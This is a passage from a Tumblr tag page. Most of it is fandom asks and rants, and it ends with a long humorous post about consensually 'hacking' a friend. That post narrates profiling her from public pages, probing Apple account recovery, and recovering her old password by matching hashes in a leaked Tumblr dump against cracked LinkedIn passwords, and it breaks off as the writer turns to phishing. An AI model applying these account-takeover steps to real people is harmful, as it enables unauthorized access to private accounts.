#my inbox is open so if you wanna have some polite discourse
Explore tagged Tumblr posts
thefallennightmare · 2 months ago
Note
Hey there!
I just wanted to say I'm amazed at how you handle the anon hate with class and grace. It blows my mind at how hateful people can be, especially when they can hide behind being on anon (I see the irony in me being on anon now too lol)
Sometimes as an elder millennial, I feel too old for this fandom and too old for tumblr lol. But out of all the fandoms I've been a part of during the years across various social media apps, this little community right here has been the nicest and most welcoming. I've been here less than a year and haven't talked much to anyone, but the few interactions I've had have been very polite and respectful and sometimes very funny.
I've seen the hate you and other blogs/writers have posted about and it disgusts me. I haven't gotten involved in any of the discourse because I try to keep my vibes positive and friendly. But now I just wanna say something to you and your fellow writers - please don't stop writing or give in to the hate and negativity. Yes, their words hurt and are discouraging but for every "hater" you have, you have many more people who love and support you and your work, please choose to focus on that. I can't speak for everyone but I choose to read your stories as a way to escape from the real world, so I thank you for sharing your talent and creativity with all of us.
And if any haters are lurking, I politely ask that you please find something better to do with your time. Fic writers and fic readers are literally hurting no one, so direct your vitriol elsewhere. Don't shame others for reading and writing fics, when other people in this fandom and other fandoms have done worse things to celebrities. I hope that whatever is bothering you and causing you to be so hateful is resolved and you can find peace and positivity in your life. Treat people with kindness.
Sorry this got so long but I felt like I needed to speak up and offer my elder millennial wisdom lol 😅
🫶🏻
WELP HERE I AM CRYING!
Thank you so fucking much for this long and lovely message. It was something I needed after these last couple of days! I also stay on the good side of the fandom because there are SO many wonderful and lovely people here. I've met so many amazing people, and I am so thankful to call them my friends. I do my best to ignore all the anon hate messages I get but sometimes, I feel the need to defend myself and my blog(which seems to be a lot more recently).
I will never turn off my anon option because a lot of my followers love the option to remain on anon because it's what they're comfortable with. I refuse to let some miserable person who chooses to throw hate on anon ruin it for others.
I am choosing to always focus on every single one of you who always loves and supports me rather than the few who have nothing better to do than to spew unnecessary hate.
And one thing I ALWAYS say is "kill em with kindness."
Also, my inbox is always open! Feel free to pop in anytime and we can chat about whatever! My blog is a safe space for everyone. 🪽🖤
8 notes · View notes
merryfae · 7 years ago
Text
Yall mind if I rant: The Sequel Nobody Wanted
The newest comic got me to question my stance on Korra/sami yet again (the dashes here exist to keep it out of the tags, just in case that’s still a problem). The short version of this is that my stance really hasn’t changed. (Also, just a headsup, I haven’t read my old anti k/s post in a long time, but it’s probably full of logical fallacies and the lot, so…what I’m getting at here is please don’t judge me based on what I’ve written in the past). 
I remember when I loved LOK. Book 1, I was able to look past the flaws, because the tension, characters, and atmosphere was so good. Book 2, the flaws became harder to overlook, but the Avatar Wan episode was definitely an experience. Book 3 was an entirely solid outing, though I missed some of that original atmosphere from Book 1. And then Book 4. I was so excited for the finale, because Book 4, despite its flaws, had been pretty great. But through the majority of the finale I was thinking to myself, “is that it?” Like, don’t get me wrong, there were some good fight scenes between Korra and Kuvira, and Mako’s sacrifice was pretty powerful, but most of it was underwhelming. It felt less like a wrap up of the show, and more like a wrap up of that season. Nothing from past seasons really tied together with the exception of the spirit portal. Plot elements from past seasons that could have been integrated into the show were dropped altogether. I don’t know. It was disappointing. 
So I was already in a bad mood, and the entire ending with Korra//sami kind of killed it even more for me. Because representation is important, no doubt. I push for it a lot myself. But not when it impedes the storytelling. The storytelling of LOK? Didn’t warrant it. This is coming from someone who, at the start of Book 3, loved the idea of Korra/sami. Their interaction in the car? Adorable. Asami sparring with Korra? Great. But there was nothing in future episodes to build up to a romantic conclusion. There was a scene where Korra blushed when receiving a complement from Asami. That’s the only scene between Korra and Asami that implied romantic intent. That and Mako’s whole, “What is with you two???” thing when they all go out for lunch, but goodness, if that wasn’t the most forced, inconsequential conflict I’ve seen in this series. I mean, if you have to tell the audience that there’s something going on between these characters instead of showing us, maybe there’s a reason a portion of your audience didn’t latch on to your intent. 
The problem with every scene where Asami and Korra interact (aside from the fact that they don’t bond over internal, character-building struggles, and instead just solve external problems together) is that most scenes are just Asami supporting Korra emotionally. Which, okay, for another character, that could imply romance. However, Asami’s character is already naturally caring and nurturing. She was already a character who was entirely supportive of the rest of the cast, so it’s no stretch of the imagination by any means to view her supporting Korra with tea or her offering intimate support when Korra is devastated in the Book 3 finale as inherently platonic. And, given that she was a support figure already, Korra sending her letters that the others “wouldn’t understand” can likewise read as platonic. This would be different if a character like, say, Opal interacted with Korra in similar ways after her introduction, a character who did not exist to offer unconditional support to our main leads already throughout the show, and whom Korra alternatively exhibits support for in Book 3 (or maybe I just really like their air bending scene together. I don’t know. Don’t hold me to that one). And that covers basically all of Korra and Asami’s interactions – Asami offering Korra support, and Korra accepting (usually) that support. That is, aside from those short (very short) but sweet moments at the beginning of Book 3. Plus, Book 4 takes place after a years-long gap as well, so the fact that we’re only shown them interacting once outside of the finale in Book 4 really speaks volumes. Which is not to mention that, aside from that last scene they have together, they hardly interact in the finale at all. I wanted to like this ship. I really, really did. But not when the writing didn’t add up. 
And then there’s the fact that Bryke’s claims that Korra/sami was intended from the beginning are obviously false. I mean, they’re on record saying that after Book 2, relationship drama had come to an end, and they were ready to focus on friendship. If I remember correctly, the voice actors had to be called back in after the finale had already been finished in order to include that last scene with Korra and Asami. It was literally last minute. 
It certainly doesn’t help that I dislike basically every ship in LOK. I never liked B/opal either. I didn’t like M/asmi, and Ma/korra didn’t have the best development itself. Honestly, I don’t think Bryke are good at writing romance period. But I’m angrier about Korra/sami, because not only is it a relationship involving the show’s main character, but it’s the central focus of the scene that ended the entire show. Say what you want about Kat/aang, but at least that ship was planned and introduced beyond minimal amounts of subtext from day one. It was a consistent part of the story. And alternatively, if LOK had ended with Ma/korra like it did in Book 1, I wouldn’t be necessarily pleased with it, but at least there was a textual history there between the two. 
And I hear the arguments about how Bryke couldn’t include textual evidence of Korra/sami because it was a ship between two women. Okay, point taken. I mean, they did admit that they didn’t even bother asking Nick until last minute, but I digress. But jeez, you could at least develop their relationship a bit, couldn’t you? Again, the only conflicts these two face together are external ones. Korra and Asami fight a gang. Asami carries Korra away from danger while Mako and Bolin fight off baddies. Korra and Asami escape/crash/rebuild an airship. In none of these scenes together do they have any meaningful interactions. Maybe you could count Korra grinning at Asami for two seconds while they rebuild the airship. Maybe. But they don’t bond over anything or talk about anything except what’s happening to them at the hands of outside forces (or essentially, what’s relevant to the plot). Hence why Asami’s offer of unconditional support of Korra in the Book 3 finale rings a little hollow. It’s just Asami doing what she’s been doing the whole time, albeit with a more emotional framing. 
And all this could all lead me to explaining why I didn’t like the conclusion of Korra’s character arc, or why I didn’t like how Asami was essentially a plot device until Book 3, and even then, she wasn’t given any real development. (In fact, I’m actually kind of bitter that the show didn’t write Asami better. Her entire character basically revolved around A) the love triangle nonsense or B) her father/company). But if I were to go in depth with that, it’d take another thousand or so words, and I’m amazed I even had the drive to write this whole thing in the first place. In short, the show really is a mess. 
Now, I’m only writing all this because I’ve seen panels from the comic. The first few panels I saw, I figured I shouldn’t judge too harshly. I didn’t see enough of the actual comic to draw a conclusion. But with the new ones out, it’s safe to say that the comic seems relatively out of character for both Korra and Asami. Seriously, maybe one sentence in there sounded like it could come from Korra. I implore you all to switch the dialogue and pretend Korra is saying Asami’s lines, and Asami is saying Korra’s. Do you feel the character-charged dialogue? Me neither. And anywho, I’m a bit frustrated people are hailing Korra/sami as the epitome of representation when it’s really…not. It’s hard seeing Korra develop into a nearly unrecognizable character for me, because she was the saving grace of the show from day one. 
Korra/sami isn’t the only ship that’s frustrated me like this. I downright despise several forced ships in fictional media, especially when it’s detrimental to a character’s development. I didn’t like J/ashi from Samurai Jack. Krist/anna or Kristoff/anna or whatever the heck it’s called from Frozen was pretty awful. Several Marvel movies (of which I am a fan) have awful romance subplots (Sta/ron and Bruce/nat are the biggest offenders). At the end of the day, Korra/sami isn’t the biggest offender. It does offer quality bi representation between two WOC. But that doesn’t mean we have to like it. Go ahead and enjoy your ooc comics folks. Who knows. Maybe it’ll actually be good. 
139 notes · View notes
atlantis-scribe · 3 years ago
Note
Okay I really do love Atlantis, but the amount that some people woobify Rodney actually drives me crazy. And I actually love Rodney as a character but like my boy's an asshole sometimes!! like he's not a perpetual victim, let him be wrong about stuff and grow and improve as a person!! (also the recurring theme of having random women in his life be abusive for... no textual reason?? is a little sus) like I'm getting to the point where I can hardly (1/2)
(2/2) enjoy hurt/comfort with Rodney bc I'm so wary of this... which just makes me sad 😭 Really sorry for ranting in your inbox you are my fave Atlantis blog and I like your take on Rondey
hello there!
please don’t apologize for ranting. my inbox is always open to rants. they’re encouraged, even! (long as I get to rant back lol)
and my oh my is this one of the topics that also get me going, particularly because 1) Rodney is also my favorite character, 2) I, too, see this woobification tendency, and 3) it’s complicated af & touches on several running themes not just in Stargate but in almost all fandoms.
• the Rodney Woobification is ancient practice. the SGA (specifically McShep) fan community has been around for a while now, and the Stargate fandom as a whole is even the birthplace of many established tropes that people still use to this day (Daniel Whump, anyone?). I understand the appeal. hell, I love angst and hurt & comfort for reasons almost exactly the same as other people who woobify characters love to do their thing. I don’t always comment on it (I don’t wanna be That Dick raining on other people’s parades) because it’s a slippery slope that so often leads to outright gatekeeping. there’s really just a fine line between being critical of fic characterization �� being ‘true’ to the source material — and having fun with fannish works (specifically, using art as an outlet to do the most bizarre things polite society would ostracize you for)
• that being said, I am also not a big fan of woobie!Rodney. there’s a reason why I had such a visceral reaction to the Post-Trinity Phenomenon & the Lemon Chicken trope.
you have to understand, I came into the fandom a little over two years ago. about a decade too late, really. all the stories have been written, the takes taken, and the discourse over & done with. it’s pretty lonely, but the fun is in trying to sift thru what the OG fans left behind. so to stumble upon such a treasure trove of fics with the same running theme and have such a fierce ‘Nope!’ reaction was pretty memorable. I love Trinity because the Rodney in that episode was allowed to be his most obnoxious, his most arrogant, his most unlikable, but still remain layered & nuanced & complex, and that’s pretty damn good writing there. I saw the ‘asshole’ label when I bought it, after all. I certainly don’t want it erased or buried under a rug. I want it explored.
• canon writing is a-whole-nother problem altogether. it’s hard to justify exactly what makes Rodney (& Sheppard & Weir & everyone else) genuine or true to form, because —  let’s be honest — SGA is not a prime example of stellar TV writing and/or storytelling. it’s addictive as all hell, but it’s severely flawed, and that includes how it handled consistency in characterization. this brings us back to the dangers of gatekeeping and yelling at other people for how they write (however beloved) ‘public domain’ fictional characters.
• what I want to advocate now in terms of woobie!Rodney is for other fans to maybe examine why they like Rodney. is it because we are all just weak for white, asshole geniuses who are shippable with other white (often same gender, often male) assholes? if that’s the case, and you want to continue making your content, go ahead. it’s frankly a pretty boring reason, but we’re all boring nerds here. some more than others. just, you know, tag properly & don’t be rude to other fans who may have different reasons.
me? I love Rodney because yes, he’s a white asshole genius (that archetype is like crack for real) but portrayed so wonderfully by a very talented actor that it left me with a nuanced character whose gaps I can fill with attributes I want to analyze as a lifelong fan of the human condition who occasionally writes fics for popular media. woobifying him would be a disservice to how I see him & the things I love about him, which would then render me unable to enjoy the Rodney I ‘stan’. that would defeat the entire purpose of why I engage with the fandom, because at the end of the day, I’m here to have fun.
• so no matter how much I (and you as well, I suspect, my dear anon) would want to police this practice, it just isn’t our place. the best (and the right) thing for us to do is curate our fandom experience and create the content we actually want to consume. who knows, we may just convince / inspire enough people so there’d be more of the same kind of things we enjoy out there :)
- kit
35 notes · View notes
gourmetrat · 3 years ago
Text
Tumblr media
GENERAL INFO.
Tumblr media
do not interact
Tumblr media
— minors are welcomed on my blog but only interact with sfw content
— have your age visible (18+) if you are going to interact with nsfw or dc (sending in asks/leaving comments)
— do not share my work on other platforms
— hate towards dc/dc creators is not tolerated
— any type of xenophobia, homophobia, islamophobia, racism, etc. is not tolerated
Tumblr media
inbox/requesting rules
Tumblr media
— first and foremost, any ask i get that i don’t vibe with i have the right to delete and ignore no questions asked
— my inbox is always open if you just wanna chat or wanna send in thirsts/thoughts/suggestions/fluff hcs/etc. basically just give me smth to work off of
— i only do requests (full on fics) for mutuals who i interact with!! feel free to request whenever :))
— please no political discourse in my inbox
— click here for topics i don’t write about + characters i write for
Tumblr media
tagging / warnings
Tumblr media
— warnings will be indicated at beginning of post
— dark content will also be indicated at beginning of post and with an additional #tw: dark content in tags
— dark content pieces will also be italicized on my masterlists, recent works, and works in progress pages
— click here to see all tags used on my blog
Tumblr media
miscellaneous
Tumblr media
— i’d love some emoji or nicknamed anons if you don’t feel comfy sending asks off of anon
— char anons head over to @fastfoodrat !!
— if you’re wondering what i have in the works currently, check out my works in progress (i’m bad about updating my wips tho so if you’re actually wanting to know what i’m writing send an ask akfjskhf)
— it’s my goal to make f!reader whenever i write as ambiguous as possible so i can be inclusive of everyone here. while i am not white, my skin still gets noticeably red. so sometimes i may slip up in my writing, and if i do slip up please send me a polite ask and i will change it immediately.
— any additional questions should be sent to my ask box
Tumblr media
1 note · View note
jxpper · 5 years ago
Text
with more and more asks coming into my inbox, I feel like we’re reaching dangerous territory and I just wanted to say something about it. so, if you’re seeing this because you’re headed to my inbox, take a moment to read, please. 
I don’t quite understand why everyone seems to feel compelled to tell me that they disagree with something I’ve said on the topic of a theory or an interest that isn’t canonical if that makes sense. I’ve had this sudden influx of winona/david asks and I’m kinda curious as to why this is happening. I’m trying really hard not to sound mean because I don’t want to come off as rude, that’s not my intention. But believing in a controversial ship or simply posting a photo such as their selfies at the SAGs seems to bring in everyone’s opinion into my inbox which I didn’t ask for. This happens every time I post something related to danona and suddenly everyone comes to my inbox with discourse that I didn’t ask for or recommend. Like I said, I really don’t want this to come off as rude but I’d like for people to understand that when I post something Danona related, it’s not my way of asking for a debate. I see the points I’m getting in my inbox and I respect it. But each time I get these messages, each time I get a new ask about something controversial like Danona, it opens up more room for people to come and attack me which I didn’t ask for. So I’m asking, please to whoever is reading this, don’t send me negative asks (not that the last few asks have been negative because they haven’t, but some in the past have) because it’s opening a door for negative replies. 
If you have a different opinion than mine, that’s perfectly fine. In fact, I respect that if you can respect mine. Obviously, I don’t expect everyone to see things from my same perspective. That would be silly and so egotistical that it makes me wanna gag lol. But, if your opinion is different than mine, please don’t come into my inbox just to tell me that because it makes everyone else think that that’s what I want. I don’t want my inbox to eventually become a battlefield of people who argue with me or my perspective. I don’t mind when people exchange theories with me or just chat, but it’s different when your sole purpose is to tell me that you think I’m wrong about something that is only a theory; a perspective. Like my opinion is wrong.. It gives people the belief that I’ve somehow requested to know how their opinions differ from mine on a certain topic like a ship and sometimes their opinions turn into attacks on me and other shippers. None of us want that. If you don’t like something I post, please either ignore it or unfollow me. No hard feelings. But please, don’t open up a gateway for me and my mutuals to be targetted when my blog is supposed to be a safe place for myself and people with shared interests as me. 
I just want people to see that when you send me something, it’s not just your way of expressing your beliefs with me. it’s creating a whole new post which has the ability to become a thread for an attack. 
I understand that sometimes I get riled up and maybe go off the deep end with my posts. But that isn’t an invitation for an argument.
Thankfully, the last few anons I’ve had have been kind and polite and I really appreciate that... I just worry that it’ll turn into something not so kind and I’d like to avoid that. 
8 notes · View notes
naamahdarling · 7 years ago
Text
I say this kindly, but if you wanna land in my inbox and ask me questions that lead me to think you even remotely might be looking for ammunition to use against me, or someone else, or that you are trying to feel out my position on some problematic Tumblr personality, I’m gonna just delete it.  Doesn’t matter what my actual opinion is.
No lie, I have three of these kinds of messages in my inbox and IDK what’s up with that, but I’m not getting out of the car.
Tumblr media
There is some interpersonal drama on this site I will not come near for love or money because it is absolutely savage all around.  It doesn’t matter what “side” I’m on, I’m still not putting my foot in that mess just to satisfy someone else’s curiosity about where I stand, because there is no “side” that doesn’t come with the inconvenience of getting attacked by mostly perfectly decent people and the lessening of my faith in humanity that ensues.
Y’all can probably surmise where I stand on most things based on the sorts of things I reblog.  My blog is a pretty accurate instrument with which to gauge my outrage and my sense of humor.  You shouldn’t use it to draw conclusions about what I think of individual Tumblr people.
Reblogging something doesn’t mean I agree with all the politics of every single person who contributed to the thread, even if I agree with the point they made on that post.  Saying “soandso is trash but this thread is good” and proving myself virtuous by denouncing sinners every time I open my mouth is just not a thing I’m prepared to do anymore.  I’m old now, and I get tired.
“Do you think smacking beehives with sticks is good or bad?” is a valid question I would probably be willing to answer, although I really think you should probably be able to guess where I stand (Nazis are bad, abuse is bad, bigotry is bad, cats are the best pets, etc.) and if you disagree with these basic things, in the words of @elodieunderglass​, I do not think you will like my blog very much.
“Soandso is a terrible person who smacks beehives/does not smack beehives, jsyk,” is something I prefer not to have to deal with because wow, do I ever not have the spoons for drama. I will take action if I think I need to, though I probably will not respond, nor should you ask me to.  Leave that up to me.
“Soandso has taken part in problematic bee discourse, and just now I saw that they were in a thread you reblogged.  Would you care to make a comment?” is . . . not a thing that gives me good feelings, whether I agree with beehive-smacking or not.  “Did you know about Soandso’s beehive-smacking?  It bothers me that you would support/denounce them/their act by reblogging this thing!” makes me kind of annoyed because wow, that hostility isn’t necessary.  “Stop defending/denouncing Soandso/beehive smacking! You’re awful!” makes me angry, because usually I haven’t defended or denounced anyone.  The content is just there among other content, and I’m interacting with some other aspect of it.  (Like, I’ve actually never gotten a message about this over any of the times I’ve actually done such a thing.  It’s all been jumping to conclusions based on proximity. That’s kind of fucked up, when you think about it.)
If you want to know what I think of beehives, ask.  If you want to warn me about bees or sticks in general, warn me.  If you think I need to know that Soandso specifically is Team Free Bees (or Team Smack Those Hives), tell me.  But don’t make me feel singled out, and don’t ask me to single anyone else out, publicly OR privately.  I understand why you are doing what you are doing, but it’s disturbing to be asked, even in a roundabout way, to shun someone publicly when they are not a public figure, or to be expected to pass/fail some weird ideological purity test I didn’t even consent to taking in the first place.
If you take issue with how I run my garbage blog, and suspect I might be on the “wrong” side of the bee/stick equation, and this is really troubling you, please unfollow and block me so you aren’t bothered by having to wonder. I promise I won’t be offended.  There are tons of other really cool blogs to follow.
466 notes · View notes
defaultnamehere · 7 years ago
Text
Operation Luigi: How I hacked my friend without her noticing
This blog has moved! This post and other mistakes are now at https://mango.pdf.zone
Hello and welcome to a blog post. I am writing it and you are reading it. It's amazing what we can do with computers these days.
Several months ago
I'm at a ramen place with my friend Diana. Diana isn't her real name, but we're going to pretend it is because that's what all the cool journalists do and I wanna fit in too so don't ruin this for me okay.
I ask her if it would be okay for me to try and hack all her stuff. She's instantly visibly excited. I explain how this could result in me seeing everything she's ever put on a computer ever. She tells me she thinks this is going to be "so good". We lay down some rules:
I'll start some time in the next 12 months
No deleting anything she has
No disrupting her daily life
Stop asking if she's sure it's okay
Bonus rule from me: Do this entire thing in stealth mode. Don't ever let Diana know that I've started until it's too late.
I mean, obviously it worked since you and I are having this nice little textual discourse right now. Take my hand metaphorically, and I'll guide you through what I tried, my many flubs1, and how to protect yourself from what I did2.
And uh also at the end Mario's green friend is there.
Part 1: Research
"""Open Source Intelligence Gathering""""" AKA googling furiously and pretending you went to uni for this
Alright uh I'm pretty sure the first thing you do when you're hacking someone is find all their personal information. I'm talking about her email, phone number, address, star sign, whether she uses Android or Windows Phone, her birthday, and so on.
Jeez we're gonna need to know her email address aren't we?
People put lots of their information on LinkedIn (an information landscape that connects your inbox to people you met once in a bar and will forever file under "misc") because it tells them to.
The first thing I see on Diana's LinkedIn3 is her email address. I hastily put on my black hoodie and get my arms a bit stuck in the sleeves. Hacker voice I'm _in_4. Immediately I sigh and put my hands on my temples like a stressed-out banker. It's a @hotmail.com address, which surprises me since, well, who's using Hotmail in the year of our lord 2017? I mean geez if you used hotmail you'd miss out on gmail's excellent security features heyoooo
[x] email address [ ] the respect of my peers
Does she use this email for Twitter?
Yep.
How about her phone number?
I type a bunch of extremely clumsy things into Google. I'm talkin' "[email protected] phone". A matrix of what looks like zeroes and ones but is actually Google search results flies down my screen at about the speed a normal person would scroll at.
There's a sign-up page for a club she started at her university. The page says "Contact Diana Lastname at [email protected] or [her phone number]". pew pew got 'em.
[x] email [x] phone number [ ] the respect of my peers
Storing the goods
I paste all these things into a Google Doc - an advanced NSA hacking tool leaked in the recent Shadow Brokers incident.
While googling securely, I find an old blog of hers from 2009. It has a search box. I immediately slam "pet", "cat" and, "dog" in that search box like it's 2009. The name of someone's pet is often somehow involved in their security, either as their password or as a "Security""" question or something. I find the name of her dog from 2009 and vigorously paste it into my Google Doc.
Let's try getting into her iCloud account
Armed with my weapons-grade Google Doc, I'm ready to have a go at trying to get into something of Diana's5.
I don't really have a good reason for going after iCloud, so if you could just give me a break for one second
If I click "Forgot Apple ID?" on iCloud, by entering Diana's full name and email address, Apple tells me her Apple ID, and my screen permanently changes to green-on-black text to suit my new lifestyle.
I'm clicking around and there's a section called "account recovery". Sure, I'll have a go.
I can recover the account by clicking "I've uh lost my phone and forgot my password AND locked out of my email". Apple says "okay you colossal bozo, fine, but give us a phone number you CAN access, and we'll SMS you instructions to get back into your account". If I was in a movie doing ~crimes~ then I'd use a burner phone number. But since this is just my friend, I use my real phone number. I get an SMS from Apple being like "We received your request and will get back to you within 4 to 6 business millennia. Our Neo-Future Customer Service Representatives will contact your next-of-kin by whatever means of communication is prevalent at the time."
There's another "account recovery" option that says "use a device you already have". I click this, hoping to get a list of Diana's Apple devices. Instead it gives me this:
Daaaaaaaaaaaaaaaammmmit.
I have taken the wrong path in this text adventure game.
I've just notified Diana that someone's trying to reset her account.
For me that would set off all kinds of alarm bells and I'd start furiously investigating what's going on with all my accounts because I'm very cool and collected. But I'm just going to hope that Diana is a normal human being who is not obsessively paranoid like me and just ignores all of those pesky automated emails from Apple and Microsoft being like "blah blah account blah" or "blah blah new sign in blah" because I mean who really has time for those we've all got places to go and phones to scroll I mean reallY who's gonna pay attention to one liTtlE email when there's a whole OCEAN of low quality memes to scroll past on Facebook? I mean wouldn't you rather see some nice political memes? Newsfeed alert: Some guy from high school has just been tagged in- oh wow lOok this one's about your local government, wowee they've even managed to use the meme font while standing their ground and writing all the text as though it's a trying-to-sound-formal letter from your school principal who is still desperately trying to combat cyberbullying using nothing but stern words and beginning every sentence with "In regards to...."
There's no way for me to know if she saw the notification, so I stop rolling around on the floor whispering about low quality memes and get back to work.
Several days later
My phone rings. I can feel the vibration in my pocket and I'm like "is someone calling me here in the year of our lord 2017 I can't believe this". I don't recognise the number.
"Hello?"
"Hi, who am I talking to?"
"It's uh Alex."
"Alex?"
"Yeah."
"Alex ``?"
"Uh, noooo it's-"
"Ohhhhhhhhhhhhh."
"Wait so who am I talking to?"
It's Diana.
"What's up?", I ask.
She explains to me how she got an email from Apple about her account and there was a phone number in it. I tug my collar several meters into the next room, knocking over several carefully-potted indoor plants.
I hit pause on this whole thing, immediately own up, and say "yep, that was me, no need to worry, and I didn't get anywhere, your iCloud account is safe and s- WAIT a minute are you telling me you got an email from Apple saying someone tried to reset your account, realised it wasn't you, saw the phone number, and then CALLED it? What was your plan if some hacker answered??"
She didn't have a plan. She just called it as soon as she saw it, the absolutely off-the-rails lunatic.
We have a nice chat and agree to hang out later. She asks me if I've "hacked her already", and I say "no comment" to preserve my so-far flawless operational security.
Before I hang up, I wanna show off my work so far.
"Hey Diana, one more thing"
"Yeah?"
"Check it out. Did you ever play a game called........ Fashion Fantasy Beach?"6, I say, coolly and relatably.
Diana freaks out and starts laughing. She's forgotten about this game and me reminding her of her account brings back good memories.
"Can you like, find all the accounts I had on all those game websites?"
Sweet young Diana. If only it worked that way. Hacking can only be used for stealing government secrets and ransoming bitcoins. It's just not that simple.
"By the way, just checking, it's still okay for me to try and hack all your stuff right?" "SO okay"
Part 2: Hackinggggg
At this point I could reset Diana's password for some services by answering her "Security""" Questions with all the information I've gathered.
But, I realise, far too late and to the live studio audience's disappointment, that would violate the "don't interfere with her daily life" part of our deal. If I reset her password, this will lock her out of whatever account I reset. So, I have to get access stealthily. This will uh heavily involve knowing her password rather than resetting it.
For a long time I consider doing the renaissance-era "send 'em a word doc with a macro in it to get control of their computer then submit to defcon" but I worry that sweet young millennials like Diana don't even use Word because they do everything on their phone or Google Docs while simultaneously consuming 17.28 avocados per second look it up.7
I guess that makes the most valuable thing in her life her email. If you remember earlier, I cunningly divined her email address in Part 1, so I'm basically halfway there. If I get her email, I can just reset her password for Facebook, Twitter, Fashion Fantasy Beach, etc. My cyber attack vector cyber entry point exploit would then be typing the password into the Hotmail login screen using the Google Chrome Web Browsing Software.
The shady password market
Alright listen we're about to go into password paradise so buckle whatever it is you normally buckle. Hackers right, they hack websites. Hoo boy they just love to pop those hypertext pages. Like Dropbox, MySpace, LinkedIn, Adobe, Tumblr, and many, many more. They try to steal everyone's username and password from these sites by making a copy of the database and taking it. Sometimes, the database of usernames and passwords they steal gets released on the ~dark web~, for free or for money. Conveniently, there's a website (https://haveibeenpwned.com) which lets you type in your email address (not your password you big bozo) and find out whether any of your passwords have appeared in these leaked stolen databases.
But.... nowhere does it say you have to type in your email address. Cunningly, I type [email protected], executing hacking.
Here we can see a couple of websites Diana has accounts on have been hacked. The only one which had passwords stolen for Diana was Tumblr. So the next goal is to acquire the Tumblr database leak from 2013.
Let's get the old Tumblr database
I try to use my ~hacker connections~ to get a copy of the Tumblr database. I meet a someone whose forum handle is like d4rkrayne or whatever in a local park at 11pm. A colossal vape cloud leads me to him, waiting under a tree, puffing furiously. I look down my 1987 mirror-tinted aviators and say "how much?" (my voice comes out several octaves lower and all grizzly like a 40-year-old generic white dude movie star with like, juuust the right amount of stubble). He sells me the database on a pile of 442 floppy disks for 5,000 credits. What a ripoff. I teleport behind him, say "nothin' personal, kid", and hoverboard-kickflip into the night.
...I download the Tumblr database from a publicly accessible, unauthenticated, absolutely non-dark web website. I scramble to get back in my black hoodie, and whip on a second pair of sunglasses over the first. I'm in.
Ancient forbidden password rituals
The Tumblr database dump - a hacking Quest Item - is one long file with lines that look like this:
[email protected]:3a1920ceb2791d034973c899907847cb58810808
That weird thing after the email is a password hash. A password hash is like a scrambled up version of the password. You can't unscramble it. If you know the password though, you can scramble it and get the same omlette, if ya know what I'm sayin'🍳.
My goal here is to figure out what Diana's actual password is, given that I have her password hash. This process is commonly known as "hacking".
These particular passwords are not just hashed, but also salted8. This means that before each password is hashed, the good folks at Tumblr added an extra bit of text to the end of each one. So instead of hashing, say, cooldad64, they'd hash cooldad64HNc62V8.
Finding the salt
There's no official information on what kind of hashes are in Tumblr.txt.
The fully sick attack I want to do is: hashing a big list of passwords I just happen to have lying around wow and checking if any of the hashes match Diana's password hash. This is called a "dictionary attack", because the person who invented it was actually a dictionary. The trouble is, you need to know the salt to do this.
I google around some more, bask in the glory of very poorly constructed sentences on some ~hacker forums~, and ask my ~hacker connections~ in an attempt to find out what the salt is.
But I can't find it because fun fact I'm a total fraud.
Can I get the password... without the salt?
So remember how Tumblr salted the passwords by sticking some random stuff on the end to thwart wannabees like me?
The trouble is.... They stick the same thing (in my example, HNc62V8) on the end of every password. This isn't considered the best practice here in the year of our lord 2017, because it means that users with the same password have the same password hash. The emails and passwords would look like this:
[email protected]:cooldad64HNc62V8 [email protected]:cooldad64HNc62V8 [email protected]:p@triots69HNc62V8 [email protected]:Bongo1HNc62V8
I search Tumblr.txt for not [email protected], but for her password hash. (3a1920ceb2791d034973c899907847cb58810808)
I find more than 20 Tumblr users with the same password as Diana aw yeah
[REDACTED]@email.com:3a1920ceb2791d0... [REDACTED]@email.com:3a1920ceb2791d0… [REDACTED]@email.com:3a1920ceb2791d0… [REDACTED]@email.com:3a1920ceb2791d0…
This makes me think that Diana's password is probably not very unique, since all these other Dr. Who enthusiasts on Tumblr have also thought of it.
But also. Now I've got 20 other email addresses with the same password as Diana. Thanks to the miracle of everyone using the same password for everything, I've got a way to find Diana's password.
I just so happen AGAIN WOW WHATTA GUY to have the LinkedIn database dump from when LinkedIn was 360 whirlwind slam hacked in 20129.
Why do I care about the dump from the LinkedIn hack, you ask, fatigued from many gags and desperate for the part where we actually hack Diana?
LinkedIn also hashed their passwords in 2012, but they didn't add that freshly ground pink Himalayan rock salt to them. Also, the password hashing method they used is cripplingly insecure10 (SHA1 for all you extremely online people out there). Because of these flubs, most (>97%) of the passwords in the LinkedIn dump are available in plain text, not even hashed at all thanks to the hard work and GPU cycle donations of people in the password cracking community.
I get the 20-ish Tumblr emails who have the same Tumblr password as Diana, and look them all up in the LinkedIn dump. They're not all in there, but good enough baybee.
[REDACTED]@email.com:qwerty1 [REDACTED]@email.com:killer6 [REDACTED]@email.com:qwerty1 [REDACTED]@email.com:qwerty1
More than 80% of them have the same LinkedIn password. (Which we will say is qwerty1.)
This has gotta be Diana's password from Tumblr in 2013. Since all these people had the same password on Tumblr, and most of them have the password qwerty1 on LinkedIn, it's very likely that Diana's Tumblr password is qwerty1.
I try to log in to her Hotmail account with the password qwerty1.
"Incorrect password"
Wait please this was supposed to be easy please no why is it like this don't do this to me
Oh come on I was supposed to be hacking a normal person who uses the same password for everything this isn't fAiR. There are entire criminal industries built on the idea that people use the same password all over the place because nobody cares enough to remember more than a few passwords because they've got things to scroll on their phone okay.
Somehow, Diana is one of the rare few people who is not a security expert but has more than one password for her stuff.
I try this password on a few of her other accounts (Facebook, Twitter, iCloud) and it works on none of them11.
On Facebook, I'm conveniently informed that this password was her password 5 months ago, but isn't any more.
Looks like I just missed out. The plot thickens audibly.
This was supposed to be the part where I say "and then I logged into her email 100% stealthily", equip my third consecutive pair of sunglasses, and move on to the next bit. But alas, Diana was only in one leaked password list on haveibeenpwned.com at the time, so there goes that.
Fiiiiiiiiiiine whatever I don't even care I'm not crying, you're crying. Time to do this the old fashioned way. And by "the old fashioned way" I of course mean "the way government hackers do it".
Part 3: Hackinggggg (again)
Social engineering
Alright so we're just going to trick her into telling me her password. Is that cheating? Basically. But absolutely I'm going to do it anyway.
To get into her email, I need to know Diana's email password. Resetting the password won't work (since that would interrupt her life by locking her out of her email). I don't really wanna follow her around, man-in-the-middle attack her phone or laptop when it connects to insecure WiFi and steal her browser session, so that leaves us with: phishing.
You may have heard of "phishing", the process of emailing someone and tricking them into doing something, like giving you their password.
Now, hold up bucko, you're probably thinking of the kind of phish where someone says "good day sir I nigerian prince give you $1 million dollars USD u are royalty 2 me" etc. etc.
